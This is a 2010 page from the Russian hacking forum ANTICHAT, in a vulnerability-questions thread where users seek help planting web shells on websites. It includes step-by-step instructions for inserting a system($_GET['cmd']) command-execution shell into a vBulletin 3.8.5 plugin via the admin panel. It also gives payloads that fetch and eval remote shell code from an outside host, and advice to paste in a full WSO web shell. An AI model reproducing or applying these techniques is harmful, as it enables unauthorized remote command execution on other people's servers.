FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1299 из 2422

1299

Опции темы

Поиск в этой теме

Опции просмотра

20.05.2010, 00:26

Saiga

Познающий

Регистрация: 22.07.2008

Сообщений: 49

Провел на форуме:
170912

Репутация: -4

Цитата:

Сообщение от m0Hze

/tmp/ - директория не доступная с веба.
Если льете в нее, то необходим lfi, что-бы этот файл проинклудить и выполнить.
Насчет www.site.com/2.php?cmd=dir, а файл то создался? Если файл создался, но выполнения команд нету, то скорее всего, вы залили неверное содержимое.

Спс

в /var/lib/mysql/ipw18/www/ нельзя делать запись.
(Can't create/write to file '/var/lib/mysql/ipw18/www/2.php' (Errcode: 2)

По поводу local file include..
где можна с этим ознакомится .. в googl.ru ничего покачто не нашел (что мог бы переварит и понять

)

Куда еще можна залить шелл кроме как ('site/www') или ('tmp')
Для меня это тёмный лес покачто, если есть статья то поделитесь люди добрые (link)

20.05.2010, 00:27

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от Saiga

По поводу local file include..
где можна с этим ознакомится .. в googl.ru ничего покачто не нашел (что мог бы переварит и понять

)

http://forum.antichat.ru/nextnewesttothread30606.html
https://forum.antichat.net/showthread.php?p=188561

20.05.2010, 00:39

Jokester

Познавший АНТИЧАТ

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Цитата:

Сообщение от Saiga

в /var/lib/mysql/ipw18/www/ нельзя делать запись.
(Can't create/write to file '/var/lib/mysql/ipw18/www/2.php' (Errcode: 2)

Конечно туда "нельзя делать запись". Ведь этой диры нету, и (Errcode: 2) как раз об этом говорит тебе.

Было-бы удивительно если-бы она там оказалась =\

С каких дел в дирректории мускула какой-то мудак будет размещать веб? Где ты берёшь эти чудопути?

Последний раз редактировалось Jokester; 20.05.2010 в 00:41..

18.05.2010, 20:44

GOGA075

Участник форума

Регистрация: 30.03.2008

Сообщений: 208

Провел на форуме:
869744

Репутация: 18

Какие есть способы заливки шела на vBulletin® Version 3.8.5

Последний раз редактировалось GOGA075; 18.05.2010 в 21:10..

18.05.2010, 21:38

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от GOGA075

Какие есть способы заливки шела на vBulletin® Version 3.8.5

а поиском кто будет пользоватся?
click

18.05.2010, 22:04

GOGA075

Участник форума

Регистрация: 30.03.2008

Сообщений: 208

Провел на форуме:
869744

Репутация: 18

пробовал так

Цитата:

1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

cmd=eval(file_get_contents('http://site.ru/downloads/shell.txt'));
и
cmd=include($_GET['http://site.ru/downloads/shell.txt']);

нефига не работают!!

18.05.2010, 22:09

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

Цитата:

Сообщение от GOGA075

пробовал так

cmd=eval(file_get_contents('http://site.ru/downloads/shell.txt'));
и
cmd=include($_GET['http://site.ru/downloads/shell.txt']);

нефига не работают!!

не больше 60 кб - ничто не мешает вам туда вставить сразу код WSO

18.05.2010, 22:17

GOGA075

Участник форума

Регистрация: 30.03.2008

Сообщений: 208

Провел на форуме:
869744

Репутация: 18

Цитата:

Сообщение от Pashkela

не больше 60 кб - ничто не мешает вам туда вставить сразу код WSO

В таком случае форум выдает ошибку
(но шел востпроизводится)

Цитата:

Ваш запрос не может быть обработан, так как маркер безопасности отсутствует.

Если эта ошибка произошла после выполнения обычного действия и при повторном выполнении действий она не исчезает, то, пожалуйста, сообщите администратору об этом, не забыв указать максимально полное описание действий, которые привели к её возникновению.

19.05.2010, 09:24

budden

Участник форума

Регистрация: 26.07.2008

Сообщений: 267

Провел на форуме:
1343031

Репутация: 184

Цитата:

Сообщение от GOGA075

пробовал так
и
cmd=include($_GET['http://site.ru/downloads/shell.txt']);

нефига не работают!!

меня одного смутило?

#10

18.05.2010, 22:00

B0o0M

Участник форума

Регистрация: 03.08.2009

Сообщений: 103

Провел на форуме:
413428

Репутация: 13

Да хотелось бы знать что за низкий уровень, и как его использовать

Страница 1299 из 2422

1299

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ